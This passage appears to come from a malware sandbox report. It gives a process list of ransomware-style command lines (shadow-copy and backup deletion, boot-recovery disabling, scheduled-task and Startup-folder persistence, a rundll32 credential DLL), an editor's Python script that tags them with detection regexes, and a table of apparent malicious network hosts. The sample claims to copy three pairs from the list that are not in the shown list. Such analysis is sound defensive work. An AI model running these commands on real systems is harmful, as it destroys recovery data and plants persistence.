"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe
"C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8a643770bf\
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8a643770bf\
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4676 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6461221041355251164,1627525864450512408,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\patchs\{F7272CFD-2FF2-4971-9BBA-D45F35549C00}\MaskVPNUpdate.exe
"C:\Program Files (x86)\MaskVPN\patchs\{F7272CFD-2FF2-4971-9BBA-D45F35549C00}\MaskVPNUpdate.exe" /update /Silent
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\ProgramData\ca82a716069a53\cred.dll, Main
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
"C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe" /delfolder
C:\Program Files (x86)\MaskVPN\MaskVPN.exe
"C:\Program Files (x86)\MaskVPN\MaskVPN.exe" /tray
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_5E84.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
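The command lines in the process list above are the actionable part of the report: shadow-copy and boot-recovery tampering (vssadmin, wbadmin, bcdedit, wmic shadowcopy), the Defender service stop and the Add-MpPreference exclusion, a scheduled task that re-launches drbux.exe every minute, the Startup shell folder redirected to a Temp directory, a TrustedInstaller.exe running from AppData\Roaming, and rundll32 loading a DLL out of ProgramData. One caveat when writing rules against this layout: the image line is the on-disk path, so a 32-bit process shows SysWOW64 while its command line still says System32 (normal WOW64 file-system redirection); match on the command line, not the image. The Python below is an added example, written by the editor and not part of the sandbox's output, that parses the page's two-line-per-process layout and tags those lines. The sample pairs are a constructed subset copied from the list above, and the ATT&CK technique ids in the rule table are the editor's mapping, not something the report states.

```python
"""Tag the suspicious command lines in a sandbox process list.

Input is the two-line-per-process layout used on this page: the image
path on one line, the full command line on the next. Added example; the
rule table and its ATT&CK mapping are the editor's, not the sandbox's."""
import re

# Constructed sample: pairs copied verbatim from the process list above.
# The final pair (explorer.exe with no arguments) is a benign control.
SAMPLE = r"""
C:\Windows\system32\sc.exe
sc stop windefend
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\EA23.exe" -Force
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe" /F
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8a643770bf\
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -start
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\ProgramData\ca82a716069a53\cred.dll, Main
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
"""

# (tag, ATT&CK id or None, field to match, regex). Command-line rules match
# the command line, not the image: a 32-bit process shows a SysWOW64 image
# while its command line still says System32 (WOW64 redirection).
_RULES = [
    ("inhibit-recovery", "T1490", "cmdline",
     r"vssadmin\s+delete\s+shadows|wbadmin\s+delete\s+catalog|"
     r"wmic\s+shadowcopy\s+delete|"
     r"bcdedit\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"),
    ("defender-tamper", "T1562.001", "cmdline",
     r"\bsc\s+stop\s+windefend\b|Add-MpPreference\s+-ExclusionPath"),
    ("persist-scheduled-task", "T1053.005", "cmdline",
     r'schtasks(\.exe)?"?\s+/Create\b'),
    ("persist-startup-folder", "T1547.001", "cmdline",
     r"User Shell Folders.*\bStartup\b"),
    ("masquerade-os-binary", "T1036.005", "cmdline",
     r"\\AppData\\.*\\(TrustedInstaller|svchost|explorer)\.exe"),
    ("rundll32-programdata", "T1218.011", "cmdline",
     r'rundll32(\.exe)?"?\s+C:\\ProgramData\\'),
    ("image-in-user-profile", None, "image", r"\\AppData\\"),
]
RULES = [(tag, tid, field, re.compile(rx, re.I)) for tag, tid, field, rx in _RULES]


def parse_process_list(text):
    """Return (image, cmdline) pairs; the page lists every process as two
    consecutive lines, so an odd line count means the input is truncated."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 2:
        raise ValueError("process list is not image/command-line pairs")
    return list(zip(lines[0::2], lines[1::2]))


def classify_process(image, cmdline):
    """Return [(tag, technique_id)] for every rule the process trips."""
    fields = {"image": image, "cmdline": cmdline}
    return [(tag, tid) for tag, tid, field, rx in RULES if rx.search(fields[field])]


def triage(text):
    """Keep only the processes that trip at least one rule."""
    findings = []
    for image, cmdline in parse_process_list(text):
        tags = classify_process(image, cmdline)
        if tags:
            findings.append({"image": image, "cmdline": cmdline, "tags": tags})
    return findings


def technique_ids(findings):
    """Distinct ATT&CK ids across all findings, for the report summary."""
    return sorted({tid for f in findings for _, tid in f["tags"] if tid})


if __name__ == "__main__":
    for f in triage(SAMPLE):
        tags = ", ".join(f"{tag} [{tid}]" if tid else tag for tag, tid in f["tags"])
        print(f"{tags}\n    {f['cmdline']}")
    print("techniques:", " ".join(technique_ids(triage(SAMPLE))))
```

On the sample the explorer.exe control pair produces no finding, the two recovery-tampering lines both land on T1490, and the TrustedInstaller.exe entry is the only one that trips two rules (a Windows-sounding binary name and an image under the user profile). Feed the full list from the page to the same `triage` call to get every hit, including the wbadmin and wmic shadowcopy lines that the sample omits.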
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| N/A | 20.54.89.106:443 | | tcp |
| N/A | 8.8.8.8:53 | fe3cr.delivery.mp.microsoft.com | udp |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 20.190.159.134:443 | | tcp |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 20.73.194.208:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | | tcp |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.189.118.208:80 | | tcp |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | hockeybruinsteamshop.com | udp |
| N/A | 8.8.8.8:53 | fsstoragecloudservice.com | udp |
| N/A | 8.8.8.8:53 | i.spesgrt.com | udp |
| N/A | 8.8.8.8:53 | privacytoolz123foryou.xyz | udp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | a.goatagame.com | udp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 52.219.158.26:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | iplogger.org | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.67.145.110:443 | a.goatagame.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 52.219.158.26:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 72.21.81.240:80 | | tcp |
| N/A | 172.67.216.236:80 | swretjhwrtj.gq | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 195.2.78.163:25450 | | tcp |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 186.2.171.3:80 | 186.2.171.3 | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 193.56.146.22:26336 | | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 193.56.146.22:47861 | | tcp |
| N/A | 104.26.8.187:80 | proxycheck.io | tcp |
| N/A | 45.14.49.128:5385 | | tcp |
| N/A | 37.0.8.88:44263 | | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 95.181.172.100:55640 | | tcp |
| N/A | 135.148.139.222:1494 | | tcp |
| N/A | 52.219.64.38:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.64.38:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 144.202.76.47:443 | www.listincode.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 66.29.130.154:80 | perfect-request-smart.com | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.21.1.69:443 | one-wedding-film.xyz | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
